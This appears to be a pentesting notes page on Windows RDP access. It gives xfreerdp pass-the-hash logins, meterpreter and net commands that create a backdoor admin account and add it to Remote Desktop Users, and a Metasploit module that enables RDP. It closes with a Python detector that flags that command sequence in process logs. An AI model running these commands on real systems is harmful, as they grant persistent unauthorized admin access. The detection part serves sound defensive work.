akde/infosec

Information security is ultimately about managing risk


Use rdesktop for a normal login

rdesktop $target

Normal login for a local user

xfreerdp /cert-ignore /u:user /p:pass /v:$target

Login for a domain user

xfreerdp /cert-ignore /u:user /d:dom.com /p:pass /v:$target

To log in with an NTLM hash (pass-the-hash), use xfreerdp.

xfreerdp /u:Peter /pth:666fb5b812a486f87062670c3baf1852 /v:$target

Allow the built-in Administrator account to log in via RDP

net localgroup "Remote Desktop Users" Administrator /add

Create a new admin and enable RDP

Open a meterpreter shell.

Note: Depending on the system language, the group may not be called "administrators". Check the name of the administrator group with net localgroup first.

meterpreter > execute -f "net user /add uuu xHQvZRbB%X8F" -i
meterpreter > execute -f "net localgroup administrators uuu /add" -i
meterpreter > execute -f "net localgroup \"Remote Desktop Users\" uuu /add" -i

Or directly in a shell:

net user /add uuu xHQvZRbB%X8F
net localgroup administrators uuu /add
net localgroup "Remote Desktop Users" uuu /add

(Don't use something like 12345678 as the password, because it could be silently rejected by the password policy.)

Activating RDP

  1. Open a session in Metasploit
  2. Execute msf> use post/windows/manage/enable_rdp
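The three net commands above (create a user, add it to the administrators group, add it to "Remote Desktop Users") are a sequence a defender can correlate in process-creation logs. The following is an added detection example, not code from this page: it classifies net command lines and flags a host where all three steps occur within a time window. The sample events, host names and the German group names in ADMIN_GROUPS/RDP_GROUPS are constructed assumptions.

```python
import shlex
from collections import defaultdict

# Constructed sample process-creation events: (host, timestamp in seconds, command line).
SAMPLE_EVENTS = [
    ("ws01", 100, 'net user /add uuu xHQvZRbB%X8F'),
    ("ws01", 101, 'net localgroup administrators uuu /add'),
    ("ws01", 102, 'net localgroup "Remote Desktop Users" uuu /add'),
    ("ws02", 200, 'net user alice'),                          # benign query
    ("ws02", 201, 'net localgroup "Remote Desktop Users"'),   # benign listing
]

NET_BINARIES = {"net", "net.exe", "net1", "net1.exe"}
# Group names granting admin or RDP rights; the page notes these are localized,
# so the German names are an assumption and the sets must be extended per estate.
ADMIN_GROUPS = {"administrators", "administratoren"}
RDP_GROUPS = {"remote desktop users", "remotedesktopbenutzer"}


def classify(cmdline):
    """Return 'user_add', 'admin_add', 'rdp_add' or None for a single command line."""
    try:
        # Non-POSIX split keeps "Remote Desktop Users" as one token (quotes stripped below).
        tokens = [t.strip('"').lower() for t in shlex.split(cmdline, posix=False)]
    except ValueError:                      # unbalanced quotes: nothing we can parse
        return None
    # Only net/net1 invocations carrying /add are of interest; queries and listings are not.
    if len(tokens) < 3 or tokens[0].rsplit("\\", 1)[-1] not in NET_BINARIES or "/add" not in tokens:
        return None
    if tokens[1] == "user":
        return "user_add"
    if tokens[1] == "localgroup":
        if tokens[2] in ADMIN_GROUPS:
            return "admin_add"
        if tokens[2] in RDP_GROUPS:
            return "rdp_add"
    return None


def find_rdp_backdoor_hosts(events, window=300):
    """Hosts where a user creation is followed within `window` seconds by admin and RDP group additions."""
    hits = defaultdict(list)
    for host, ts, cmd in sorted(events, key=lambda e: e[1]):
        kind = classify(cmd)
        if kind:
            hits[host].append((ts, kind))
    flagged = []
    for host, seq in hits.items():
        for ts, kind in seq:
            later = {k for t, k in seq if ts <= t <= ts + window}
            if kind == "user_add" and {"admin_add", "rdp_add"} <= later:
                flagged.append(host)
                break
    return flagged
```

Each single step is also worth a low-severity event on its own; the correlation only raises the priority when the full sequence appears on one host.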
